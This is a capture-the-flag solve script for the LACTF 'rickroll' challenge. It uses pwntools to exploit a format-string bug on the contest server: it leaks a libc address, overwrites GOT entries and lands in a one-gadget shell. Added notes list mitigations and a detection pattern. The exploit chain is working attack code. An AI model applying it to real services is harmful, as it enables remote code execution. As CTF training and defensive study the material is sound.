xct/solve.py Secret
Last active February 11, 2023 15:21
LACTF rickroll (format string, leak + overwrite at the same time)
from pwn import *
import binascii
context.clear(arch = 'amd64')  # reset pwntools' global context and target x86-64 (helpers such as fmtstr_payload take the word size from here)
context.terminal = ['alacritty', '-e', 'zsh', '-c']  # terminal command pwntools uses to open the debugger window for the (currently commented-out) gdb.attach()
# gdb hack: point pwntools' gdb helper at the gef wrapper binary
def _new_binary():
    """Return the debugger executable name pwntools should launch.

    Installed as ``gdb.binary`` so that attaching spawns the GEF-wrapped
    gdb rather than plain ``gdb``.  Takes no arguments and has no side
    effects; it only returns the fixed name.
    """
    debugger_name = "gdb-gef"
    return debugger_name
# Defender's notes (what this script depends on, and which build/runtime settings remove each dependency):
# - The service passes attacker-controlled text to a printf-family format argument: the "%p" and
#   "%c…%n"-style directives below are interpreted by the target.  printf("%s", buf) and
#   -Wformat -Werror=format-security remove the primitive entirely.
# - Every target address is a fixed constant (base 0x400000, 0x404018, 0x404028), which implies a
#   non-PIE binary (inferred from the constants; the binary itself is not shown).  PIE randomises them.
# - Two GOT-range addresses are written, which implies partial or no RELRO (inferred).  Full RELRO
#   (-Wl,-z,relro,-z,now) makes the GOT read-only after relocation, so the second stage has nowhere to write.
# - Building with _FORTIFY_SOURCE=2 makes glibc reject "%n" in a format string stored in writable memory
#   and reject positional arguments with gaps, which breaks both payloads.
# - Detection: a single request carrying "%<n>$" directives and raw non-printable bytes, followed by a
#   very long (thousands of characters) response, is a high-signal pattern for this class of bug.
gdb.binary = _new_binary  # monkeypatch so gdb.attach() launches the gef wrapper instead of plain gdb
base = 0x400000  # assumed load base of the target binary (non-PIE — inferred from the fixed address)
ret_main = 0x117d  # offset of the return-to-main target inside the binary; 0x117d == 4477 decimal (see the payload comment)
p = remote('lac.tf',31135, level='debug')  # connects at import time; level='debug' logs every byte exchanged
#p = process("./rickroll", level="debug")  # local alternative to the remote connection
libc = ELF("./libc/libc.so.6")  # NOTE(review): loaded but never consulted — the offsets below are hard-coded
#gdb.attach(p, f'''
#break *{base+0x117d}
#continue
#''')
# Find the format-string argument index (probe kept for reference):
#buf += b"AAAABBBB%6$p"
buf = b""
payload = b"%39$paaa" # leak libc: print stack argument 39 as a pointer ("0x" + 12 hex digits, 14 chars) plus 3 pad bytes = 0x11 chars total; the value is treated below as an address inside libc
# %[value]c%[index]$[write_type][padding][address] (\x7d\x11 = 4477)
# %c pads the output so that exactly 4477 (0x117d) characters have been printed once the 0x11 leaked
# above are counted; %9$hn then stores the low 16 bits of that count — i.e. ret_main — through the
# pointer in argument 9, which is the 8-byte little-endian 0x404018 appended at the end.  The "aaaab"
# filler positions that address on the stack slot the author found by probing (layout not verifiable here).
payload += "%{}c%{}${}{}{}".format(4477-0x11,9,"hn","aaaab","\x18\x40\x40\x00\x00\x00\x00\x00").encode() # offset required to account for the prefix already printed
print(payload)
buf += payload
p.recvuntil("Lyrics:")  # NOTE(review): a str is passed; pwntools coerces it to bytes — b"Lyrics:" would not rely on that
p.sendline(buf)
p.recvline()  # discard the line preceding the leak output (presumably the echoed prompt line — confirm)
leak = p.recv(41)[-12:]  # read 41 bytes and keep the last 12, i.e. the hex digits of the %p output without its "0x" (assumes a 6-byte address printed as 12 hex chars)
leak = int(leak,16)
print(f"Leak: {hex(leak)}")
base_offset = 0x23D0A  # distance from the leaked pointer to the libc load base, hard-coded for the provided libc build
one_gadget = 0xc9620  # libc offset of a one-shot shell gadget (presumably found with a gadget search tool; not derivable here)
base = leak - base_offset  # rebinds `base` from the binary's address to libc's — only the libc value is used from here on
print(f"Base: {hex(base)}")
buf = b""
buf += fmtstr_payload(7, {0x404028: base+one_gadget}) # overwrite puts: pwntools builds a write of the 8-byte value to 0x404028 using argument 7 as the first controlled slot
p.recvuntil("Lyrics: ")  # the second prompt only appears because the first write redirected execution back to main (inferred)
p.sendline(buf)
p.interactive()  # hand the session over to the operator
p.close()